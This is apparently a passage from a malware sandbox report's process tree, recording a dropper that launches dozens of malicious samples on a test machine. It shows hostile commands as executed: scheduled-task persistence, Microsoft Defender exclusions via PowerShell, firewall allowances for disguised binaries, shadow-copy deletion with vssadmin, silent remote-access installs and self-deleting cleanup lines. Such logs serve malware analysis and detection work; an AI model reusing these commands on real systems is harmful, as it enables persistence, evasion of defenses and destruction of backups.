  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      4⤵
      PID:9808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8144 -s 1060
      4⤵
      Program crash
      PID:15032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8144 -s 1060
      4⤵
      Program crash
      PID:11244
- - C:\Users\Admin\Desktop\Files\svhoste.exe
    "C:\Users\Admin\Desktop\Files\svhoste.exe"
    3⤵
    PID:7776
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\svhoste.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9200
- - C:\Users\Admin\Desktop\Files\jgurtgjasdth.exe
    "C:\Users\Admin\Desktop\Files\jgurtgjasdth.exe"
    3⤵
    PID:8624
- - C:\Users\Admin\Desktop\Files\AsyncClient.exe
    "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
    3⤵
    PID:8912
  - - C:\Users\Admin\Desktop\Files\._cache_AsyncClient.exe
      "C:\Users\Admin\Desktop\Files\._cache_AsyncClient.exe"
      4⤵
      PID:32292
    - - C:\Users\Admin\Desktop\Files\Files\vncgroups.exe
        
        "C:\Users\Admin\Desktop\Files\Files\vncgroups.exe"
        5⤵
        
        PID:32072
      - C:\ProgramData\idmans\idmans.exe
        
        "C:\ProgramData\idmans\idmans.exe"
        6⤵
        
        PID:34720
    - - C:\Users\Admin\Desktop\Files\Files\Client.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Client.exe"
        5⤵
        
        PID:37404
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Shell Interactive" /sc ONLOGON /tr "C:\Windows\system32\Windows Shell Interactive.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:47732
- - C:\Users\Admin\Desktop\Files\r2.exe
    "C:\Users\Admin\Desktop\Files\r2.exe"
    3⤵
    PID:43160
- - C:\Users\Admin\Desktop\Files\anne.exe
    "C:\Users\Admin\Desktop\Files\anne.exe"
    3⤵
    PID:60420
- - C:\Users\Admin\Desktop\Files\CondoGenerator.exe
    "C:\Users\Admin\Desktop\Files\CondoGenerator.exe"
    3⤵
    PID:26312
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:53004

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6420
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6792
- - C:\Users\Admin\Desktop\Files\Java.exe
    "C:\Users\Admin\Desktop\Files\Java.exe"
    3⤵
    PID:37860
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:65056
- - C:\Users\Admin\Desktop\Files\Meredrop.exe
    "C:\Users\Admin\Desktop\Files\Meredrop.exe"
    3⤵
    PID:43668
- - C:\Users\Admin\Desktop\Files\discord.exe
    "C:\Users\Admin\Desktop\Files\discord.exe"
    3⤵
    PID:14976
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Microsoft Service" /sc ONLOGON /tr "C:\Windows\system32\SubDir\main-pc.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:48328
- - C:\Users\Admin\Desktop\Files\update.exe
    "C:\Users\Admin\Desktop\Files\update.exe"
    3⤵
    PID:26908
- - C:\Users\Admin\Desktop\Files\wefhrf.exe
    "C:\Users\Admin\Desktop\Files\wefhrf.exe"
    3⤵
    PID:35900
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:39756

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6636
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6908
- - C:\Users\Admin\Desktop\Files\3.exe
    "C:\Users\Admin\Desktop\Files\3.exe"
    3⤵
    PID:7672
  - - C:\Users\Admin\Desktop\Files\3.exe
      "C:\Users\Admin\Desktop\Files\3.exe"
      4⤵
      PID:912
- - C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe
    "C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
    3⤵
    PID:424
  - - C:\Users\Admin\AppData\Local\Temp\is-5STHP.tmp\SrbijaSetupHokej.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-5STHP.tmp\SrbijaSetupHokej.tmp" /SL5="$40594,3939740,937984,C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
      4⤵
      PID:8988
    - - C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe
        
        "C:\Program Files (x86)\Serbia Ice Hockey DB\Hokej.exe"
        5⤵
        
        PID:13328
- - C:\Users\Admin\Desktop\Files\anne.exe
    "C:\Users\Admin\Desktop\Files\anne.exe"
    3⤵
    PID:8964
  - - C:\Users\Admin\Desktop\Files\._cache_anne.exe
      "C:\Users\Admin\Desktop\Files\._cache_anne.exe"
      4⤵
      PID:3908
    - - C:\Users\Admin\Desktop\Files\Files\ChromeSetup.exe
        
        "C:\Users\Admin\Desktop\Files\Files\ChromeSetup.exe"
        5⤵
        
        PID:55152
      - C:\Windows\SystemTemp\GUMDECE.tmp\GoogleUpdate.exe
        
        C:\Windows\SystemTemp\GUMDECE.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
        6⤵
        
        PID:57396
        
        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
        7⤵
        
        PID:29816
        
        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
        7⤵
        
        PID:28720
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        8⤵
        
        PID:32060
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        8⤵
        
        PID:33248
        
        C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe"
        8⤵
        
        PID:34024
        
        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUE1NEE4M0MtQkYyMS00RkY4LTg0MDUtMkUyMjNGN0VENzM4fSIgdXNlcmlkPSJ7MkQ0OERENzktMkMzNi00Q0IzLThDNTEtMkRCRENCRURGRkMyfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0IzMkFGOEI1LTk3NDYtNEMwQi05QThGLUYwNzQ3MjI1NDlEMH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9Ins0MzBGRDREMC1CNzI5LTRGNjEtQUEzNC05MTUyNjQ4MTc5OUR9IiB2ZXJzaW9uPSIxLjMuMzYuMzcxIiBuZXh0dmVyc2lvbj0iMS4zLjM2LjM1MiIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpaWQ9IntEQjI0RUREMy05OTIwLTVENUYtRkJCRS04RTc0M0Y3NDg2QzF9Ij48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBpbnN0YWxsX3RpbWVfbXM9IjUyMjE0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:37200
        
        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
        
        "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{1A54A83C-BF21-4FF8-8405-2E223F7ED738}"
        7⤵
        
        PID:37480
    - - C:\Users\Admin\Desktop\Files\Files\DK.exe
        
        "C:\Users\Admin\Desktop\Files\Files\DK.exe"
        5⤵
        
        PID:25520
    - - C:\Users\Admin\Desktop\Files\Files\injectorOld.exe
        
        "C:\Users\Admin\Desktop\Files\Files\injectorOld.exe"
        5⤵
        
        PID:29960
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:38032
- - C:\Users\Admin\Desktop\Files\any_dsk.exe
    "C:\Users\Admin\Desktop\Files\any_dsk.exe"
    3⤵
    PID:38020
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AEB5.tmp\AEC5.tmp\AEC6.bat C:\Users\Admin\Desktop\Files\any_dsk.exe"
      4⤵
      PID:29068
    - - C:\Users\Admin\AppData\Roaming\AnyDesk.exe
        
        C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
        5⤵
        
        PID:59212
- - C:\Users\Admin\Desktop\Files\000.exe
    "C:\Users\Admin\Desktop\Files\000.exe"
    3⤵
    PID:52888
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
      4⤵
      PID:41964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:27364
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 52888 -s 4224
      4⤵
      Program crash
      PID:37440
- - C:\Users\Admin\Desktop\Files\Autoupdate.exe
    "C:\Users\Admin\Desktop\Files\Autoupdate.exe"
    3⤵
    PID:19712
- - C:\Users\Admin\Desktop\Files\nbjekadkthgawd.exe
    "C:\Users\Admin\Desktop\Files\nbjekadkthgawd.exe"
    3⤵
    PID:63240
- - C:\Users\Admin\Desktop\Files\NoMoreRansom.exe
    "C:\Users\Admin\Desktop\Files\NoMoreRansom.exe"
    3⤵
    PID:15628
- - C:\Users\Admin\Desktop\Files\Syncing.exe
    "C:\Users\Admin\Desktop\Files\Syncing.exe"
    3⤵
    PID:31456
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "sync" /tr '"C:\Users\Admin\AppData\Roaming\sync.exe"' & exit
      4⤵
      PID:44212

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6760
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:7020
- - C:\Users\Admin\Desktop\Files\TT18.exe
    "C:\Users\Admin\Desktop\Files\TT18.exe"
    3⤵
    PID:9532
  - - C:\Users\Admin\Desktop\Files\._cache_TT18.exe
      "C:\Users\Admin\Desktop\Files\._cache_TT18.exe"
      4⤵
      PID:9124
    - - C:\Users\Admin\Desktop\Files\Files\c3.exe
        
        "C:\Users\Admin\Desktop\Files\Files\c3.exe"
        5⤵
        
        PID:5796
    - - C:\Users\Admin\Desktop\Files\Files\lastest.exe
        
        "C:\Users\Admin\Desktop\Files\Files\lastest.exe"
        5⤵
        
        PID:37972
      - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        6⤵
        
        PID:18376
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:29624
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM ApplicationFrameHost.exe
        7⤵
        Kills process with taskkill
        
        PID:62608
    - - C:\Users\Admin\Desktop\Files\Files\svchost.exe
        
        "C:\Users\Admin\Desktop\Files\Files\svchost.exe"
        5⤵
        
        PID:43152
    - - C:\Users\Admin\Desktop\Files\Files\444.exe
        
        "C:\Users\Admin\Desktop\Files\Files\444.exe"
        5⤵
        
        PID:15404
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        6⤵
        
        PID:56340
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE
        7⤵
        Modifies Windows Firewall
        
        PID:32528
- - C:\Users\Admin\Desktop\Files\adjthjawdth.exe
    "C:\Users\Admin\Desktop\Files\adjthjawdth.exe"
    3⤵
    PID:17384
- - C:\Users\Admin\Desktop\Files\Extension.exe
    "C:\Users\Admin\Desktop\Files\Extension.exe"
    3⤵
    PID:34212

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6980
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6164
- - C:\Users\Admin\Desktop\Files\Discord.exe
    "C:\Users\Admin\Desktop\Files\Discord.exe"
    3⤵
    PID:9480
  - - C:\Users\Admin\Desktop\Files\._cache_Discord.exe
      "C:\Users\Admin\Desktop\Files\._cache_Discord.exe"
      4⤵
      PID:9460
    - - C:\Users\Admin\Desktop\Files\Files\SGVP%20Client%20System.exe
        
        "C:\Users\Admin\Desktop\Files\Files\SGVP%20Client%20System.exe"
        5⤵
        
        PID:18528
    - - C:\Users\Admin\Desktop\Files\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe
        
        "C:\Users\Admin\Desktop\Files\Files\billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exe"
        5⤵
        
        PID:16548
    - - C:\Users\Admin\Desktop\Files\Files\7z.exe
        
        "C:\Users\Admin\Desktop\Files\Files\7z.exe"
        5⤵
        
        PID:64776
    - - C:\Users\Admin\Desktop\Files\Files\FreeYoutubeDownloader.exe
        
        "C:\Users\Admin\Desktop\Files\Files\FreeYoutubeDownloader.exe"
        5⤵
        
        PID:58116
      - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
        6⤵
        
        PID:28816
    - - C:\Users\Admin\Desktop\Files\Files\CE5M.exe
        
        "C:\Users\Admin\Desktop\Files\Files\CE5M.exe"
        5⤵
        
        PID:32244
      - C:\Users\Admin\AppData\Roaming\All function.exe
        
        "C:\Users\Admin\AppData\Roaming\All function.exe"
        6⤵
        
        PID:56088
        
        C:\Users\Admin\AppData\Roaming\ALL slumzick.exe
        
        "C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"
        7⤵
        
        PID:49360
      - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        6⤵
        
        PID:48836
    - - C:\Users\Admin\Desktop\Files\Files\IATInfect2008_64.exe
        
        "C:\Users\Admin\Desktop\Files\Files\IATInfect2008_64.exe"
        5⤵
        
        PID:49612
- - C:\Users\Admin\Desktop\Files\Fixer.exe
    "C:\Users\Admin\Desktop\Files\Fixer.exe"
    3⤵
    PID:38004
- - C:\Users\Admin\Desktop\Files\lastest.exe
    "C:\Users\Admin\Desktop\Files\lastest.exe"
    3⤵
    PID:44688

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:7108
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6544
- - C:\Users\Admin\Desktop\Files\jhnykawfkth.exe
    "C:\Users\Admin\Desktop\Files\jhnykawfkth.exe"
    3⤵
    PID:7924
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\Files\jhnykawfkth.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:3560
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7468
- - C:\Users\Admin\Desktop\Files\Prototype-https.exe
    "C:\Users\Admin\Desktop\Files\Prototype-https.exe"
    3⤵
    PID:6076
- - C:\Users\Admin\Desktop\Files\MajesticExec.exe
    "C:\Users\Admin\Desktop\Files\MajesticExec.exe"
    3⤵
    PID:7736
- - C:\Users\Admin\Desktop\Files\1.exe
    "C:\Users\Admin\Desktop\Files\1.exe"
    3⤵
    PID:4944
  - - C:\Users\Admin\Desktop\Files\1.exe
      "C:\Users\Admin\Desktop\Files\1.exe"
      4⤵
      PID:8124
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5508
    - - C:\Windows\System32\Wbem\wmic.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:4076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\Files\1.exe""
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:26080
      - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:53932
- - C:\Users\Admin\Desktop\Files\krgawdtyjawd.exe
    "C:\Users\Admin\Desktop\Files\krgawdtyjawd.exe"
    3⤵
    PID:54056
- - C:\Users\Admin\Desktop\Files\ChromeSetup.exe
    "C:\Users\Admin\Desktop\Files\ChromeSetup.exe"
    3⤵
    PID:28760
  - - C:\Windows\SystemTemp\GUM791A.tmp\GoogleUpdate.exe
      C:\Windows\SystemTemp\GUM791A.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={DB24EDD3-9920-5D5F-FBBE-8E743F7486C1}&lang=zh-CN&browser=2&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
      4⤵
      PID:53456
- - C:\Users\Admin\Desktop\Files\vanilla.exe
    "C:\Users\Admin\Desktop\Files\vanilla.exe"
    3⤵
    PID:33900
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:44872
- - C:\Users\Admin\Desktop\Files\AsyncClientGK.exe
    "C:\Users\Admin\Desktop\Files\AsyncClientGK.exe"
    3⤵
    PID:35448
- - C:\Users\Admin\Desktop\Files\trojan.exe
    "C:\Users\Admin\Desktop\Files\trojan.exe"
    3⤵
    PID:36920
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      PID:48408

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6052
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:7080
- - C:\Users\Admin\Desktop\Files\built.exe
    "C:\Users\Admin\Desktop\Files\built.exe"
    3⤵
    PID:66996
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:26368
- - C:\Users\Admin\Desktop\Files\cayV0Deo9jSt417.exe
    "C:\Users\Admin\Desktop\Files\cayV0Deo9jSt417.exe"
    3⤵
    PID:65892
  - - C:\Windows\SysWOW64\clip.exe
      "C:\Windows\SysWOW64\clip.exe"
      4⤵
      PID:37732
- - C:\Users\Admin\Desktop\Files\client.exe
    "C:\Users\Admin\Desktop\Files\client.exe"
    3⤵
    PID:57504

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6256
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6940
- - C:\Users\Admin\Desktop\Files\maza-0.16.3-win32-setup-unsigned.exe
    "C:\Users\Admin\Desktop\Files\maza-0.16.3-win32-setup-unsigned.exe"
    3⤵
    PID:1432
  - - C:\Program Files (x86)\Maza\maza-qt.exe
      "C:\Program Files (x86)\Maza\maza-qt.exe"
      4⤵
      PID:8896
- - C:\Users\Admin\Desktop\Files\CoronaVirus.exe
    "C:\Users\Admin\Desktop\Files\CoronaVirus.exe"
    3⤵
    PID:10080
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:3484
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:11688
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:52756
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:46936
    - - C:\Windows\system32\mode.com
        
        mode con cp select=1251
        5⤵
        
        PID:62916
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:11524
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
      4⤵
      PID:21292
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
      4⤵
      PID:52140
- - C:\Users\Admin\Desktop\Files\popapoers.exe
    "C:\Users\Admin\Desktop\Files\popapoers.exe"
    3⤵
    PID:37980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 37980 -s 788
      4⤵
      Program crash
      PID:13224
- - C:\Users\Admin\Desktop\Files\amt.exe
    "C:\Users\Admin\Desktop\Files\amt.exe"
    3⤵
    PID:19980
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\SysWOW64\more.com
      4⤵
      PID:20488
- - C:\Users\Admin\Desktop\Files\NVIDIA.exe
    "C:\Users\Admin\Desktop\Files\NVIDIA.exe"
    3⤵
    PID:30856
- - C:\Users\Admin\Desktop\Files\plantrojan.exe
    "C:\Users\Admin\Desktop\Files\plantrojan.exe"
    3⤵
    PID:30928

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5452
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6380
- - C:\Users\Admin\Desktop\Files\mthimskef.exe
    "C:\Users\Admin\Desktop\Files\mthimskef.exe"
    3⤵
    PID:7268
- - C:\Users\Admin\Desktop\Files\Discord3.exe
    "C:\Users\Admin\Desktop\Files\Discord3.exe"
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      PID:8340
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7308.tmp.bat""
      4⤵
      PID:8884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:9804
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        
        PID:10236
- - C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe
    "C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"
    3⤵
    PID:10048
  - - C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"
      4⤵
      PID:9524
- - C:\Users\Admin\Desktop\Files\w.exe
    "C:\Users\Admin\Desktop\Files\w.exe"
    3⤵
    PID:8776
- - C:\Users\Admin\Desktop\Files\pornhub_downloader.exe
    "C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
    3⤵
    PID:22876
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A27.tmp\5A28.tmp\5A29.bat C:\Users\Admin\Desktop\Files\pornhub_downloader.exe"
      4⤵
      PID:29760
- - C:\Users\Admin\Desktop\Files\SearchUII.exe
    "C:\Users\Admin\Desktop\Files\SearchUII.exe"
    3⤵
    PID:10956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7828 -ip 7828
1⤵
PID:7708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 8580 -ip 8580
1⤵
PID:9212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 8680 -ip 8680
1⤵
PID:9780

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D8 0x00000000000004DC
1⤵
PID:10140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 8144 -ip 8144
1⤵
PID:8508

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe
1⤵
PID:11672

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\19737ae94b56497fa6302e144dbf3a09 /t 3324 /p 3320
1⤵
PID:21388

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:36376

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:67508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 11356 -ip 11356
1⤵
PID:21036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 876 -p 1212 -ip 1212
1⤵
PID:40280

C:\Windows\SysWOW64\WerFault.exe
